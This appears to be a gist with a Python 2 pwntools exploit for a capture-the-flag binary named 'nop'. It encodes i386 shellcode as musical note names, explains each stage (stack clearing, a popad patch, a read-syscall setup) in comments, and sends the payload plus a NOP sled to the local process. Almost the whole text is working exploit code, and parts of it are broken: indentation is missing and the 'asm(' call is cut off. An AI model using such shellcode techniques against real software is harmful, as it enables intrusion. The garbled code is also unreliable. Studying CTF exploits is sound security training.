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Created May 14, 2018 01:56
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#!/usr/bin/env python2
from pwn import *
context.arch = "i386"
table = {'G#1': 101, 'G#0': 51, 'G#3': 404, 'G#2': 202, 'G#5': 1614, 'G#4': 807, 'G#7': 6456, 'G#6': 3228, 'G#9': 25823, 'G#8': 12912, 'G7': 6094, 'G6': 3047, 'G5': 1524, 'G4': 762, 'G3': 381, 'G2': 191, 'G1': 96, 'G0': 48, 'G9': 24374, 'G8': 12187, 'D#8': 9673, 'D#9': 19346, 'A9': 13680, 'A8': 6840, 'B4': 480, 'B5': 960, 'B6': 1920, 'B7': 3839, 'B0': 30, 'B1': 60, 'B2': 120, 'B3': 240, 'B8': 7678, 'B9': 15355, 'F#0': 45, 'F#1': 90, 'F#2': 180, 'F#3': 360, 'F#4': 719, 'F#5': 1438, 'F#6': 2876, 'F#7': 5752, 'F#8': 11503, 'F#9': 23006, 'E9': 20496, 'E8': 10248, 'E5': 1281, 'E4': 641, 'E7': 5124, 'E6': 2562, 'E1': 81, 'E0': 41, 'E3': 321, 'E2': 161, 'A#3': 227, 'A#2': 114, 'A#1': 57, 'A#0': 29, 'A#7': 3624, 'A#6': 1812, 'A#5': 906, 'A#4': 453, 'A#9': 14493, 'A#8': 7247, 'C9': 16268, 'C8': 8134, 'C3': 255, 'C2': 128, 'C1': 64, 'C0': 32, 'C7': 4067, 'C6': 2034, 'C5': 1017, 'C4': 509, 'F0': 43, 'F1': 85, 'F2': 170, 'F3': 340, 'F4': 679, 'F5': 1358, 'F6': 2715, 'F7': 5429, 'F8': 10858, 'F9': 21715, 'A1': 54, 'A0': 27, 'A3': 214, 'A2': 107, 'A5': 855, 'A4': 428, 'A7': 3420, 'A6': 1710, 'D#6': 2419, 'D#7': 4837, 'D#4': 605, 'D#5': 1210, 'D#2': 152, 'D#3': 303, 'D#0': 38, 'D#1': 76, 'C#9': 17235, 'C#8': 8618, 'C#5': 1078, 'C#4': 539, 'C#7': 4309, 'C#6': 2155, 'C#1': 68, 'C#0': 34, 'C#3': 270, 'C#2': 135, 'D8': 9130, 'D9': 18260, 'D6': 2283, 'D7': 4565, 'D4': 571, 'D5': 1142, 'D2': 143, 'D3': 286, 'D0': 36, 'D1': 72}
def translate_notes(notes):
out = ""
notes = re.sub(r"\s+", "", re.sub(r";.*(\n|$)", "", notes))
while notes:
if notes[0] == ";":
notes = notes
i = next(i for i in xrange(4) if notes[:i] in table)
out += p16(table[notes[:i]])
notes = notes[i:]
return out
notes = """
; load RAX with 0x4f4f4f4f from stack
A3 F0
; xor the next 16 stack bytes with EAX (4 xors)
; gives 16 byte of cleared stack space, needed later
A 1G0
G6G6G6G 1G0
G6G6G6G 1G0
G6G6G6G 1G0
; now xor rax into 0x2f2f2f2f which is the the next value on the stack
G6G6G6G 1G0
; clear EAX
A 3F#6
; load 2 into AL
A 4A6 A 4C6
; xor AL into 0x62626262's bytes
A 0G0
A 0G2
A 0G3
; load 1 into AL
A 4B 4C6
; xor AL into the third byte of our 0x60.. address
A0 G1
; clear EAX
A 4A 4B6
; load EAX with 0x60606160 (the address we built on the stack)
A 3G0
;; now EAX is 0x60606160, an address in the shellcode page
; clear EDI (first and)
A #8
; increment EAX (set AL to 0x61)
A 4B 4C 6
; clear EDI (second and)
A #8
; set AL to 0x20 (0x20 ^ 0x41 (the pad value) = 0x61 (popad))
A 4A6
; apply patch
A 0D8A6
; setup stack for popad
; (this works because stack space was cleared above so we can use XOR to write values to stack)
F6F6F6F 1F0 ; EDX = EAX (count)
F6F6F6F 1F0 ; ECX = EAX (read target)
A 3F0 A 4A 4B6 ; set EAX to 3
F6F6F6F 1F0 ; EAX = EAX (syscall number)
; increment stack pointer so that popad pops correct values+ padding
""" + "D6" * 32 + """
; padding (it is important that 'A' & '6' = 0x0 to clear EDI above)
""" + "A6" * 400
binsh = chr(0x90) * 2000 + asm(
shellcode = translate_notes(notes)
shellcode += (2992 - len(shellcode)) * p16(table["A6"])
write("out", shellcode + binsh)
r = process("./nop")
r.sendafter("sound?", shellcode + binsh)
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